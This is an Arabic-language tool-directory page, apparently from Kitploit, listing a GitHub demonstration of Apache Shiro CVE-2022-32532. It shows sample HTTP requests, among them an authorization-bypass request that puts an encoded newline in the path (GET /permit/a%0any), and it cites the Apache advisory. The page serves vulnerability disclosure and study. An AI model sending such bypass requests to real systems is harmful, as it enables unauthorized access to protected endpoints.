Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2022-32532 — Apache Shiro CVE-2022-32532 | Kitploit
أدوات/GitHubGitHub/lay0us/cve-2022-32532
المصادقة والترخيصتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراق
GitHublay0us/cve-2022-32532

CVE-2022-32532

Apache Shiro CVE-2022-32532

عرض المستودع
1325منذ 4 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2022-32532

حول

هذا مشروع توضيحي، يعرض فقط أحد شروط استغلال هذه الثغرة (CVE-2022-32532).

في الواقع، هناك طرق أكثر لاستغلالها، طالما أن المطورين يستخدمون RegExPatternMatcher، فسيكون هناك ثغرة تجاوز محتملة.

مقدمة

يتطلب التحقق من رأس الطلب (Token) تحت التهيئة الحالية، وإلا فلن يكون لديك صلاحية الوصول إلى الواجهة تحت /permit

يمكن لهذا الطلب النجاح

root@kitploit:~
GET /permit/any HTTP/1.1
Token: 4ra1n

لا يُسمح بالوصول في حالة عدم وجود رأس الطلب (Token)

root@kitploit:~
GET /permit/any HTTP/1.1

يمكن تجاوزها بطريقة بسيطة في تكوينات خاصة ولكن شائعة

root@kitploit:~
GET /permit/a%0any HTTP/1.1

مراجع

https://lists.apache.org/thread/y8260dw8vbm99oq7zv6y3mzn5ovk90xh

هذه الثغرة مشابهة لـ Spring-Security CVE-2022-22978

شكرًا لـ bdemers (عضو في Apache Shiro PMC) و chybeta (باحث أمني)

تنزيل الأداة